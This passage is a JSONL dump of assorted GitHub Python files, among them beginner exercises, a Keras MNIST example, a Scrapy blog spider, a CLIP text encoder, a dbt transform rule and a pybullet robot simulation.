res\r\n\r\nprint(fib(6))\r\n\r\na = int(input(\"enter number a : \")) \r\nb = int(input(\"enter number b : \")) \r\n\r\ndef gcd(a, b):\r\n \r\n # code here to calculate and return gcd of a and b\r\n counter = a if (a geeks for geeks\r\n pat -> geeks\r\n o/p -> 0 10\r\n'''\r\n\r\ntext = \"geeks for geeksgeeksgeefs geeksian \"\r\npat = \"geeks\"\r\n\r\ni = 0\r\n\r\nwhile True:\r\n pos = text.find(pat,i)\r\n if pos == -1:\r\n break\r\n print(pos, end = \" \")\r\n i = pos + len(pat) \r\n \r\n \r\n''' i/p : text -> AAAAA\r\n pat -> AAA\r\n o/p -> 0 1 2\r\n'''\r\n\r\n#method01\r\ntext = \"AAAAA\"\r\npat = \"AAA\"\r\n\r\ni = 0\r\n\r\nwhile True:\r\n pos = text.find(pat,i)\r\n if pos == -1:\r\n break\r\n print(pos, end = \" \")\r\n i = pos + 1\r\n\r\n\r\n#method02\r\ntext = \"AAAAA\"\r\npat = \"AAA\"\r\n\r\npos = text.find(pat)\r\nwhile pos >= 0:\r\n print(pos, end = \" \")\r\n pos = text.find(pat,pos+1)\r\n \r\n \r\ndef reverseString(s):\r\n #Write your code below to reverse s and return it\r\n s_list = list(s)\r\n reverse_string = []\r\n for i in range(len(s_list)):\r\n j = len(s_list)-(i+1)\r\n reverse_string.append(s_list[j])\r\n return \"\".join(reverse_string)\r\n\r\ndef reverseString(s):\r\n return s[::-1]\r\n\r\nprint(reverseString(\"hello\"))\r\n\r\n\r\n\r\n","repo_name":"arihantvyavhare/PythonStuff","sub_path":"py_basics01.py","file_name":"py_basics01.py","file_ext":"py","file_size_in_byte":4873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"20736963509","text":"import pickle\nimport os\n\nscores = list()\n\ndef input_scores():\n score=int(input())\n if score > 0:\n scores.append(score)\n return score \n\ndef get_average(scores):\n return sum(scores)/len(scores)\n\ndef show_scores(avg):\n print(\"개인점수:\",end=\" \")\n for i in scores:\n print(f\"{i}\",end=\" \")\n print()\n print(\"평균: \",avg)\n\ndef search(scores,score):\n count =0\n for i in scores:\n find=0\n count +=1\n if i == score:\n print(f\"{score}점은 {count}번 학생의 점수입니다.\")\n find = score\n break\n if find == 0:\n print(f\"{score}점을 받은 학생은 없습니다.\")\n\nfilepath = 'C:/Users/ahn/Desktop/mlData/'\nfilename = 'score.bin'\ndef save(scores):\n with open(f'{filepath}{filename}','wb') as file:\n pickle.dump(scores,file)\n\ndef load():\n with open(filename,'rb') as file:\n scores=pickle.load(file)\n return scores\n\ni=1\n\n \n\nif not(os.path.exists(filename)):\n while True: \n print(f\"#{i}?\",end=\" \")\n n = input_scores()\n i+=1\n if n<0:\n break\n save(scores)\nelse:\n result = load()\n avg = get_average(result)\n print('[파일 읽기]\\n')\n\n print('[점수 출력]')\n show_scores(avg)\n","repo_name":"ayz1070/python","sub_path":"python programming/hw10.py","file_name":"hw10.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"37912505746","text":"from queue import Queue\n\nq = Queue()\nn = int(input())\nq.put(\"1\")\n\nwhile(n):\n\tn -= 1\n\n\ts1 = q.get()\n\n\tprint (s1)\n\n\ts2 = s1\n\n\tq.put(s1+\"0\")\n\n\tq.put(s2+\"1\")\n\n","repo_name":"pranavdave893/Leetcode","sub_path":"binary_with_queue.py","file_name":"binary_with_queue.py","file_ext":"py","file_size_in_byte":155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"71819118509","text":"import pygame\nimport sys\nimport random\nfrom Block import *\n\nVERTICAL = 10\nHORIZONTAL = 15\nTAILLE_CASE = 40\n\nFENETRE = pygame.display.set_mode(size=(VERTICAL * TAILLE_CASE, HORIZONTAL * TAILLE_CASE))\nFPS = pygame.time.Clock()\n \n \nclass Cherry:\n def __init__(self):\n x = random.randint(0,VERTICAL -1)\n y = random.randint(0,HORIZONTAL -1)\n self.block = Block(x, y)\n \n def draw_Cherry(self):\n rect = pygame.Rect(self.block.x * TAILLE_CASE,self.block.y * TAILLE_CASE, TAILLE_CASE, TAILLE_CASE)\n pygame.draw.rect(FENETRE,(255, 56, 24), rect)","repo_name":"Evolinki/SnakePygame","sub_path":"Cherry.py","file_name":"Cherry.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"29974759666","text":"import os\n\nimport keras\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nfrom tensorflow.keras.datasets import mnist\n\n(X_train, y_train), (X_test, y_test) = mnist.load_data()\nprint(X_train.shape)\n# X_train = X_train.reshape(-1, 28 * 28) # without normalization\n# X_test = X_test.reshape(-1, 28 * 28)\n\nX_train = X_train.reshape(-1,28*28)/255.0 # Normalization increases accuracy\nX_test = X_test.reshape(-1,28*28)/255.0\nprint(X_train.shape)\n\n# Sequential API\n# model = keras.Sequential([ # passing layers as list to model.\n# keras.Input(shape=(28*28)),\n# layers.Dense(512, activation='relu'),\n# layers.Dense(256, activation='relu'),\n# layers.Dense(10)\n# ])\n# print(model.summary()) // if we include input layer.\n\n# Sequential API - 2\nmodel = keras.Sequential()\nmodel.add(layers.Input(shape=(28*28)))\nmodel.add(layers.Dense(512, activation='relu'))\nmodel.add(layers.Dense(256, activation='relu',name='my_layer'))\nmodel.add(layers.Dense(10))\n\nmodel = keras.Model(inputs = model.inputs,\n # outputs = [model.layers[-1].output]\n #outputs = [model.get_layer('my_layer').output] # We can access layers by their name.\n outputs = [layer.output for layer in model.layers])\n\nfeature = model.predict(X_train)\nfor features in feature:\n print(features.shape)\n# print('feature shape :',feature.shape)\n\n\n# Functional API\n# input = layers.Input(shape=(28 * 28))\n# x = layers.Dense(512, activation='relu',name='first_layer')(input)\n# x = layers.Dense(256, activation='relu',name='second_layer')(x)\n# output = layers.Dense(10, activation='softmax')(x)\n# model = keras.Model(inputs=input, outputs=output)\n\n# import sys\n# sys.exit()\nmodel.compile(\n loss=keras.losses.SparseCategoricalCrossentropy(from_logits=True), # Only set it to True if you are not using softmax in model.\n optimizer=keras.optimizers.legacy.Adam(learning_rate=0.001),\n metrics=['accuracy']\n)\n\nmodel.fit(X_train, y_train, epochs=5, verbose=2)\nprint(model.summary())\nmodel.evaluate(X_test, y_test, verbose=2)\n","repo_name":"Asrar-Ahammad/tensorflowPractice","sub_path":"02_neuralNetwork.py","file_name":"02_neuralNetwork.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"36893205637","text":"import time\nfrom utils import readInput\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef loadInput():\n lines = readInput(\"prova.txt\")\n lines = readInput(\"input_8.txt\")\n grid = np.zeros(shape=(len(lines[0]), len(lines)))\n\n for y in range(len(lines)):\n for x in range(len(lines[0])):\n grid[x, y] = int(lines[y][x])\n return grid\n\ndef draw_forest(grid):\n plt.imshow(grid)\n plt.show()\n\n\ndef part1(grid):\n xmax, ymax = grid.shape\n visible = np.zeros(shape=(xmax, ymax))\n\n for y in range(ymax):\n height = grid[0, y]\n visible[0, y] = 1\n for x in range(1, xmax):\n if grid[x, y] > height:\n visible[x, y] = 1\n height = grid[x, y] \n\n height = grid[-1, y]\n visible[-1, y] = 1\n for x in range(xmax-1, 0, -1):\n if grid[x, y] > height:\n visible[x, y] = 1\n height = grid[x, y] \n\n for x in range(xmax):\n height = grid[x, 0]\n visible[x, 0] = 1\n for y in range(1, ymax):\n if grid[x, y] > height:\n visible[x, y] = 1\n height = grid[x, y] \n\n height = grid[x, -1]\n visible[x, -1] = 1\n for y in range(ymax-1, 0, -1):\n if grid[x, y] > height:\n visible[x, y] = 1\n height = grid[x, y] \n\n print (\"🎄 Part 1: {}\".format(visible.sum()))\n\ndef part2(grid):\n xmax, ymax = grid.shape\n dirs = [(0, 1), (1, 0), (-1, 0), (0, -1)]\n scenic_score = 0\n for x in range(xmax):\n for y in range(ymax):\n score = []\n for d in dirs:\n steps = 1\n visible = 0\n while True:\n new_x, new_y = x + steps*d[0], y + steps*d[1]\n if 0 <= new_x < xmax and 0 <= new_y < ymax:\n if grid[new_x, new_y] < grid[x, y]:\n visible += 1\n else:\n visible += 1\n break\n else:\n break\n steps += 1\n score.append(visible)\n scenic_score = max(np.prod(score), scenic_score)\n\n print (\"🎄🎅 Part 2: {}\".format(scenic_score))\n\nprint(\"⛄⛄⛄⛄⛄⛄⛄⛄⛄⛄⛄⛄⛄\")\nprint(\"⛄ Day 8 ⛄\")\nprint(\"⛄⛄⛄⛄⛄⛄⛄⛄⛄⛄⛄⛄⛄\")\n\ngrid = loadInput()\ndraw_forest(grid)\nquit()\nt0 = time.time()\npart1(grid)\nprint (\"Time: {:.5f}\".format(time.time()-t0))\n\nt0 = time.time()\npart2(grid)\nprint (\"Time: {:.5f}\".format(time.time()-t0))\n","repo_name":"matteosan1/AoC","sub_path":"2022/8.py","file_name":"8.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"40017156529","text":"import io\nimport os\n\nimport pandas as pd\nfrom dotenv import load_dotenv\nfrom minio import Minio\nfrom pysus.online_data.CNES import download\nfrom pysus.online_data.sinasc import download as download_sinasc\n\nload_dotenv()\n\n\ndef csv_to_parquet():\n landing_bucket_name = \"landing\"\n curated_bucket_name = \"curated\"\n minio_endpoint = \"localhost:9100\"\n minio_access_key = os.getenv(\"minio_access_key\")\n minio_secret_key = os.getenv(\"minio_secret_key\")\n object_name_from = \"events-sample.csv\"\n object_name_to = \"events-sample.parquet\"\n\n client = Minio(\n minio_endpoint,\n access_key=minio_access_key,\n secret_key=minio_secret_key,\n secure=False\n )\n\n found = client.bucket_exists(landing_bucket_name)\n if not found:\n client.make_bucket(landing_bucket_name)\n else:\n print(f'Bucket {landing_bucket_name} já existe!')\n\n file = client.get_object(landing_bucket_name, object_name=object_name_from)\n\n df = pd.read_csv(file)\n bytes_data = df.to_parquet()\n buffer = io.BytesIO(bytes_data)\n\n print(buffer)\n client.put_object(\n curated_bucket_name,\n object_name_to,\n buffer,\n len(bytes_data),\n 'application/parquet'\n )\n\n\ndef download_cnes():\n df = download_sinasc('SE', 2015)\n print(\"OK: \" + df.head())\n df = download(group=\"ST\", state=\"DF\", year=2021, month=1, cache=True)\n print(\"OOOOK\")\n print(\"GO\" + df.head())\n\n\ndef cnes_download():\n print(\"!\")\n\n\n\nif __name__ == \"__main__\":\n download_cnes()\n","repo_name":"GleytonLima/datasus-elt","sub_path":"src/testes_local.py","file_name":"testes_local.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"41259422736","text":"class Solution:\n def searchInsert(self, nums: 'List[int]', target: 'int') -> 'int':\n lens = len(nums)\n l, r = 0, lens-1\n while l <= r:\n mid = int((l+r)/2)\n if nums[mid] < target:\n l = mid+1\n else:\n r = mid-1\n # if l-1>=0 and nums[l] \n return l\n\nif __name__ == \"__main__\":\n print(\n Solution().searchInsert(\n [1, 2, 3, 4, 5], 2.5\n )\n )","repo_name":"kimroniny/ACM","sub_path":"LeetCode/0035/35.py","file_name":"35.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"38619335597","text":"import numpy as np\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom keras.models import Model\nfrom keras.layers import Permute, Dense, LayerNormalization, Embedding\nimport tensorflow_addons as tfa\nfrom .layers import quick_gelu, Layer\n\nclass CLIPAttention(Layer):\n def __init__(self):\n super().__init__()\n self.emb_dim = 768\n self.num_heads = 12\n self.head_dim = self.emb_dim // self.num_heads\n self.scale = self.head_dim ** -0.5\n self.q_proj = Dense(self.emb_dim)\n self.k_proj = Dense(self.emb_dim)\n self.v_proj = Dense(self.emb_dim)\n self.out_proj = Dense(self.emb_dim)\n\n def _shape(self, tensor, seq_len: int, batch_size: int):\n a = tf.reshape(tensor, (batch_size, seq_len, self.num_heads, self.head_dim))\n\n return Permute((2, 1, 3))(a) # bs, n_head, seq_len, head_dim\n\n def call(self, inputs):\n hidden_states, casual_attention_mask = inputs\n batch_size, tgt_len, emb_dim = hidden_states.shape\n query_states = self.q_proj(hidden_states) * self.scale\n key_states = self._shape(self.k_proj(hidden_states), tgt_len, -1)\n value_states = self._shape(self.v_proj(hidden_states), tgt_len, -1)\n\n proj_shape = (-1, tgt_len, self.head_dim)\n query_states = self._shape(query_states, tgt_len, -1)\n query_states = tf.reshape(query_states, proj_shape)\n key_states = tf.reshape(key_states, proj_shape)\n\n src_len = tgt_len\n value_states = tf.reshape(value_states, proj_shape)\n attn_weights = query_states @ Permute((2, 1))(key_states)\n attn_weights = tf.reshape(attn_weights, (-1, self.num_heads, tgt_len, src_len))\n attn_weights = attn_weights + casual_attention_mask\n attn_weights = tf.reshape(attn_weights, (-1, tgt_len, src_len))\n\n attn_weights = tf.nn.softmax(attn_weights)\n attn_output = attn_weights @ value_states\n attn_output = tf.reshape(attn_output, (-1, self.num_heads, tgt_len, self.head_dim))\n attn_output = Permute((2, 1, 3))(attn_output)\n attn_output = tf.reshape(attn_output, (-1, tgt_len, emb_dim))\n\n return self.out_proj(attn_output)\n \n\nclass CLIPEncoderLayer(Layer):\n def __init__(self):\n super().__init__()\n self.layer_norm1 = LayerNormalization(epsilon=1e-5)\n self.self_attn = CLIPAttention()\n self.layer_norm2 = LayerNormalization(epsilon=1e-5)\n self.fc1 = Dense(3072)\n self.fc2 = Dense(768)\n \n def call(self, inputs):\n hidden_states, casual_attention_mask = inputs\n residual = hidden_states\n \n hidden_states = self.layer_norm1(hidden_states)\n hidden_states = self.self_attn([hidden_states, casual_attention_mask])\n hidden_states = residual + hidden_states\n residual = hidden_states\n hidden_states = self.layer_norm2(hidden_states)\n hidden_states = self.fc1(hidden_states)\n hidden_states = quick_gelu(hidden_states)\n hidden_states = self.fc2(hidden_states)\n\n return residual + hidden_states\n\nclass CLIPEncoder(Layer):\n def __init__(self):\n super().__init__()\n self.layers = [CLIPEncoderLayer() for _ in range(12)]\n\n def call(self, x):\n [hidden_states, casual_attention_mask] = x\n for layer in self.layers:\n hidden_states = layer([hidden_states, casual_attention_mask])\n return hidden_states\n\n\nclass CLIPTextEmbedding(Layer):\n def __init__(self, n_words=77):\n super().__init__()\n # Token and Position Embedding Layer\n self.token_embedding = Embedding(\n 49408, 768, name=\"token_embedding\"\n )\n self.position_embedding = Embedding(\n n_words, 768, name=\"position_embedding\"\n )\n\n def call(self, x):\n input_ids, pos_ids = x\n word_embeddings = self.token_embedding(input_ids)\n pos_embeddings = self.position_embedding(pos_ids)\n\n return word_embeddings + pos_embeddings\n\nclass CLIPTextTransformer(Model):\n def __init__(self, n_words=77):\n super().__init__()\n self.embeddings = CLIPTextEmbedding(n_words=n_words)\n self.encoder = CLIPEncoder()\n self.final_layer_norm = LayerNormalization(epsilon=1e-5)\n self.casual_attention_mask = tf.constant(\n np.triu(np.ones((1, 1, 77, 77), dtype='float32') * -np.inf, k=1)\n )\n\n def call(self, inputs):\n input_ids, pos_ids = inputs\n x = self.embeddings([input_ids, pos_ids])\n x = self.encoder([x, self.casual_attention_mask])\n\n return self.final_layer_norm(x)\n ","repo_name":"Raghvender1205/AI_From_Scratch","sub_path":"DiffusionModels/StableDiffusion/stablediffusion/clip_encoder.py","file_name":"clip_encoder.py","file_ext":"py","file_size_in_byte":4621,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"38"} +{"seq_id":"7466316408","text":"# importing the requests library\nimport requests\nimport json\nimport logging\nimport datetime\n\nlogging.basicConfig(level=logging.DEBUG,\n format='[%(levelname)s] (%(threadName)-10s) %(message)s',\n )\n\nclass Request:\n # defining the api-endpoint\n API_ENDPOINT = \"http://192.168.0.11:3000/listnotes\"\n\n # your API key here\n API_KEY = \"XXXXXXXXXXXXXXXXX\"\n\n acc = {'aX': [],\n 'aY': [],\n 'aZ': []}\n\n mag = {'mX': [],\n 'mY': [],\n 'mZ': []}\n\n timestamp = '1000111111'\n\n # 'api_paste_format': 'python',\n # data to be sent to api\n data = {'title': 'msg from node number correct',\n 'acc': acc,\n 'mag': mag,\n 'timestamp': timestamp}\n\n\n def sendPost(self,data):\n listValues = data['values']\n actualTime = str(round(datetime.datetime.now().timestamp(),2))\n dataPackage = {'title': 'meranickoRanicko', 'timestamp': actualTime, 'meranie': []}\n listValues = [x.replace(\"\\r\\n\",\"\") for x in listValues]\n for i in range(len(listValues)):\n aX, aY, aZ, mX, mY, mZ, actualTime = listValues[i].split(\",\")\n acc = {'aX': aX,\n 'aY': aY,\n 'aZ': aZ}\n\n mag = {'mX': int(mX),\n 'mY': int(mY),\n 'mZ': int(mZ)}\n\n # 'api_paste_format': 'python',\n # data to be sent to api\n dataDictionary = {'acc': acc, 'mag': mag, 'timestamp': actualTime}\n dataPackage['meranie'].append(dataDictionary)\n\n # sending post request and saving response as response object\n # r = requests.post(url=Request.API_ENDPOINT, json=Request.data)\n # logging.debug(\"Sending Request with: %i elements\" % len(dataDictionary))\n\n r = requests.post(url=Request.API_ENDPOINT, json=dataPackage)\n\n # extracting response text\n pastebin_url = r.text\n # logging.debug(\"The pastebin URL is:%s\" % pastebin_url)\n","repo_name":"UserTomas/device_monitoring","sub_path":"Raspberry/APIrequests.py","file_name":"APIrequests.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"41801543812","text":"from typing import Set\n\nfrom typing_extensions import override\n\nfrom dbt_semantic_interfaces.enum_extension import assert_values_exhausted\nfrom dbt_semantic_interfaces.errors import ModelTransformError\nfrom dbt_semantic_interfaces.implementations.metric import PydanticMetricInputMeasure\nfrom dbt_semantic_interfaces.implementations.semantic_manifest import (\n PydanticSemanticManifest,\n)\nfrom dbt_semantic_interfaces.protocols import ProtocolHint\nfrom dbt_semantic_interfaces.transformations.transform_rule import (\n SemanticManifestTransformRule,\n)\nfrom dbt_semantic_interfaces.type_enums import MetricType\n\n\nclass AddInputMetricMeasuresRule(ProtocolHint[SemanticManifestTransformRule[PydanticSemanticManifest]]):\n \"\"\"Add all measures corresponding to the input metrics of the derived metric.\"\"\"\n\n @override\n def _implements_protocol(self) -> SemanticManifestTransformRule[PydanticSemanticManifest]: # noqa: D\n return self\n\n @staticmethod\n def _get_measures_for_metric(\n semantic_manifest: PydanticSemanticManifest, metric_name: str\n ) -> Set[PydanticMetricInputMeasure]:\n \"\"\"Returns a unique set of input measures for a given metric.\"\"\"\n measures: Set = set()\n matched_metric = next(\n iter((metric for metric in semantic_manifest.metrics if metric.name == metric_name)), None\n )\n if matched_metric:\n if matched_metric.type is MetricType.SIMPLE or matched_metric.type is MetricType.CUMULATIVE:\n assert (\n matched_metric.type_params.measure is not None\n ), f\"{matched_metric} should have a measure defined, but it does not.\"\n measures.add(matched_metric.type_params.measure)\n elif matched_metric.type is MetricType.DERIVED or matched_metric.type is MetricType.RATIO:\n for input_metric in matched_metric.input_metrics:\n measures.update(\n AddInputMetricMeasuresRule._get_measures_for_metric(semantic_manifest, input_metric.name)\n )\n else:\n assert_values_exhausted(matched_metric.type)\n else:\n raise ModelTransformError(f\"Metric '{metric_name}' is not configured as a metric in the model.\")\n return measures\n\n @staticmethod\n def transform_model(semantic_manifest: PydanticSemanticManifest) -> PydanticSemanticManifest: # noqa: D\n for metric in semantic_manifest.metrics:\n measures = AddInputMetricMeasuresRule._get_measures_for_metric(semantic_manifest, metric.name)\n assert len(metric.type_params.input_measures) == 0, f\"{metric} should not have measures predefined\"\n metric.type_params.input_measures = list(measures)\n\n return semantic_manifest\n","repo_name":"dbt-labs/dbt-semantic-interfaces","sub_path":"dbt_semantic_interfaces/transformations/add_input_metric_measures.py","file_name":"add_input_metric_measures.py","file_ext":"py","file_size_in_byte":2797,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"38"} +{"seq_id":"37527994613","text":"\"\"\"\nTask\nGiven n names and phone numbers, assemble a phone book that maps friends' names to their respective\nphone numbers. You will then be given an unknown number of names to query your phone book for. \nFor each name queried, print the associated entry from your phone book on a new line in the form \nname=phoneNumber; if an entry for name is not found, print Not found instead.\n\nNote: Your phone book should be a Dictionary/Map/HashMap data structure.\n\"\"\"\n\nn = int(input())\nphoneBook = {}\n\n# Fill a phonebook\nfor i in range(0, n):\n entry = str(input()).split(\" \")\n name = entry[0]\n number = entry[1] \n phoneBook[name] = number\n \n# Use while loop because don't know how many name entries will be\nwhile True:\n try:\n name = input()\n except:\n break\n if name in phoneBook:\n number = phoneBook[name]\n print(name + \"=\" + number)\n else:\n print(\"Not found\")","repo_name":"irsol/hacker-rank-30-days-of-code","sub_path":"Day 8: Dictionaries and Maps.py","file_name":"Day 8: Dictionaries and Maps.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"3887392463","text":"metadata = \"\"\"\nsummary @ Creates PKZIP-compatible .zip files\nhomepage @ http://www.info-zip.org/pub/infozip/Zip.html\nlicense @ Info-ZIP\nsrc_url @ ftp://ftp.info-zip.org/pub/infozip/src/$name30.zip\narch @ ~x86_64\n\"\"\"\n\nstandard_procedure = False\n\nsrcdir = \"zip30\"\n\ndef build():\n make(\"-f unix/Makefile LOCAL_ZIP='%s' prefix=/usr generic_gcc\" % get_env(\"CFLAGS\"))\n\ndef install():\n raw_install(\"-f unix/Makefile INSTALL=/bin/install prefix=%s/usr \\\n MANDIR=%s/usr/share/man/man1\" % (install_dir, install_dir))\n\n insdoc(\"LICENSE\")\n","repo_name":"wdysln/new","sub_path":"app-arch/zip/zip-3.0.py","file_name":"zip-3.0.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"4588339274","text":"from impulse.root import root_mtg\nfrom openalea.plantgl.all import Viewer\n\ng = root_mtg.mtg_root()\n\ns = root_mtg.Simulate(g)\n\nfor i in range(100):\n s.step()\n scene = root_mtg.plot(g)\n Viewer.display(scene)\n\n\n","repo_name":"openalea-incubator/impulse","sub_path":"src/impulse/root/test_root.py","file_name":"test_root.py","file_ext":"py","file_size_in_byte":217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"74098695471","text":"# -*- coding: utf-8 -*-\n\nfrom scrapy.linkextractors import LinkExtractor\nfrom scrapy.spiders import CrawlSpider, Rule\n\nfrom blogArticle.items import BlogArticleItem\n\n\nclass ArticleSpiderSpider(CrawlSpider):\n name = 'article_spider'\n allowed_domains = ['jianshu.com']\n start_urls = ['https://www.jianshu.com/p/61b9ef649461']\n\n rules = (\n Rule(LinkExtractor(allow=r'.*/p/[0-9a-z]{12}.*'), callback='parse_item', follow=True),\n )\n\n def parse_item(self, response):\n # 文章的标题 a_title\n title = response.xpath(\"//h1[@class='_1RuRku']/text()\").get()\n\n # 文章分类 对应item里面a_category\n category = 'Python'\n\n # 文章的发布时间 对应item里面的a_release_time ajax请求的数据,,\n release_time = response.xpath(\"//div[@class='s-dsoj']/time/text()\").get().replace(\".\", '-')\n\n # 文章的观看人数 对应item里面的a_watch_number ajax请求的数据\n read_number = response.xpath(\"//div[@class='s-dsoj']/span[last()]/text()\").get()\n read_number = int(read_number.split(\" \")[1].replace(\",\", '')) # 阅读 5,648 --> 5648 转成int\n\n # 文章的类容 对应item里面的a_content ajax请求的数据,\n content = \"\".join(response.xpath(\"//article[@class='_2rhmJa']\").getall())\n\n # 源地址 对应item里面的 a_origin\n origin = response.url.split(\"?\")[0]\n\n # 文章的简介 对应item里面a_introduce\n introduce = response.xpath(\"//article[@class='_2rhmJa']/blockquote/p/text()\").get()\n if not introduce:\n # 为空默认从文章中摘取一段\n introduce = response.xpath(\"//article[@class='_2rhmJa']/p[5]/text()\").get()\n\n # 文章简介图片 对应item里面a_introduce_img\n introduce_img = response.xpath(\"//article[@class='_2rhmJa']//img/@data-original-src\").get()\n\n item = BlogArticleItem(\n a_title=title,\n a_category=category,\n a_release_time=release_time,\n a_read_number=read_number,\n a_content=content,\n a_origin=origin,\n a_introduce=introduce,\n a_introduce_img=introduce_img,\n )\n\n yield item\n","repo_name":"Qunoal/blog-crawler","sub_path":"blogArticle/spiders/article_spider.py","file_name":"article_spider.py","file_ext":"py","file_size_in_byte":2219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"26343926878","text":"import pybullet as p\nimport time\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# physicsClient = p.connect(p.GUI)#or p.DIRECT for non-graphical version\n\n# p.setAdditionalSearchPath(pybullet_data.getDataPath()) #this will load the plane urdf \np.connect(p.GUI)\np.configureDebugVisualizer(p.COV_ENABLE_GUI,0)\np.configureDebugVisualizer(p.COV_ENABLE_RGB_BUFFER_PREVIEW,0)\np.createCollisionShape(p.GEOM_PLANE)\nplId=p.createMultiBody(0,0)\np.resetDebugVisualizerCamera( cameraDistance=4, cameraYaw=10, cameraPitch=-20, \n cameraTargetPosition=[0.0, 0.0, 0.25])\np.setGravity(0,0,-10) #along the Z axis\n\n# planeId = p.loadURDF(\"plane.urdf\")\n\n#---loading the bodyId----:\nfootIdos = [0,0,1] # it will be spawned at z=1\nstartOrientation = p.getQuaternionFromEuler([0,0,0]) #angle at which it will be spawned\n\n\n#creating the robot:\nsh_colFoot = p.createCollisionShape(p.GEOM_BOX,halfExtents=[0.01,0.01,0.1])\nsh_colBody = p.createCollisionShape(p.GEOM_BOX,halfExtents=[0.2,0.2,0.1])\nsh_colBody = p.createCollisionShape(p.GEOM_CYLINDER,radius=0.13, height=0.6)\nsh_visBody = p.createVisualShape(p.GEOM_CYLINDER,radius=0.13, length=0.6, rgbaColor=[0.4,0.4,0.5,1])\nsh_colPx = p.createCollisionShape(p.GEOM_BOX,halfExtents=[0.01,0.1,0.1])\nsh_colPy = p.createCollisionShape(p.GEOM_BOX,halfExtents=[0.1,0.01,0.1])\n\nbodyId=p.createMultiBody(baseMass=1,baseCollisionShapeIndex = sh_colBody, baseVisualShapeIndex = sh_visBody,\n basePosition = [0,0,1.5],baseOrientation=[0,0,0,1])\nfootId=p.createMultiBody(baseMass=1,baseCollisionShapeIndex = sh_colFoot,\n basePosition = [0,0,0.5],baseOrientation=[0,0,0,1])\n\n# base = p.createCollisionShape(p.GEOM_BOX,halfExtents=[0.1,0.1,0.1])\n# sh_colFoot = p.createCollisionShape(p.GEOM_BOX,halfExtents=[0.01,0.01,0.1])\n# sh_colPx = p.createCollisionShape(p.GEOM_BOX,halfExtents=[0.01,0.1,0.1])\n# sh_colPy = p.createCollisionShape(p.GEOM_BOX,halfExtents=[0.1,0.01,0.1])\n# sh_colBody = p.createCollisionShape(p.GEOM_BOX,halfExtents=[0.2,0.2,0.1])\n# Body_1 = p.createCollisionShape(p.GEOM_CYLINDER,radius=0.13, height=0.6)\n# sh_visBody = p.createVisualShape(p.GEOM_CYLINDER,radius=0.13, length=0.6, rgbaColor=[0.4,0.4,0.5,1])\n\n\n# bodyId=p.crefootIdtiBody(baseMass=1,baseCollisionShapeIndex = Body_1,baseVisualShapeIndex = sh_visBody,\n# basePosition = [0,0,1.5],baseOrientation=[0,0,0,1])\n\n# footID=p.createMultiBody(baseMass = 1,baseCollisionShapeIndex = sh_colFoot, \n# basePosition = [0,0,0.5],baseOrientation=startOrientation)\n\n# #----------------------INERTIA INCREASING PLATES-----------------------\n# cubeId3=p.createMultiBody(baseMass = 3,baseCollisionShapeIndex = sh_colPx,\n# basePosition = [-0.5,0,1.5],baseOrientation=[0,0,0,1])\n# cubeId4=p.createMultiBody(baseMass = 3,baseCollisionShapeIndex = sh_colPx,\n# basePosition = [0.5,0,1.5],baseOrientation=[0,0,0,1])\n# cubeId5=p.createMultiBody(baseMass = 3,baseCollisionShapeIndex = sh_colPy,\n# basePosition = [0,-0.5,1.5],baseOrientation=[0,0,0,1])\n# cubeId6=p.createMultiBody(baseMass = 3,baseCollisionShapeIndex = sh_colPy,\n# basePosition = [0,0.5,1.5],baseOrientation=[0,0,0,1])\ncubeId3=p.createMultiBody(baseMass=3,baseCollisionShapeIndex = sh_colPx,\n basePosition = [-0.5,0,1.5],baseOrientation=[0,0,0,1])\ncubeId4=p.createMultiBody(baseMass=3,baseCollisionShapeIndex = sh_colPx,\n basePosition = [0.5,0,1.5],baseOrientation=[0,0,0,1])\ncubeId5=p.createMultiBody(baseMass=3,baseCollisionShapeIndex = sh_colPy,\n basePosition = [0,-0.5,1.5],baseOrientation=[0,0,0,1])\ncubeId6=p.createMultiBody(baseMass=3,baseCollisionShapeIndex = sh_colPy,\n basePosition = [0,0.5,1.5],baseOrientation=[0,0,0,1])\n\n#Scenery e.g. an inclined box\nboxHalfLength = 2.5\nboxHalfWidth = 2.5\nboxHalfHeight = 0.2\nsh_colBox = p.createCollisionShape(p.GEOM_BOX,halfExtents=[boxHalfLength,boxHalfWidth,boxHalfHeight])\nsh_visBox = p.createVisualShape(p.GEOM_BOX,halfExtents=[boxHalfLength,boxHalfWidth,boxHalfHeight], 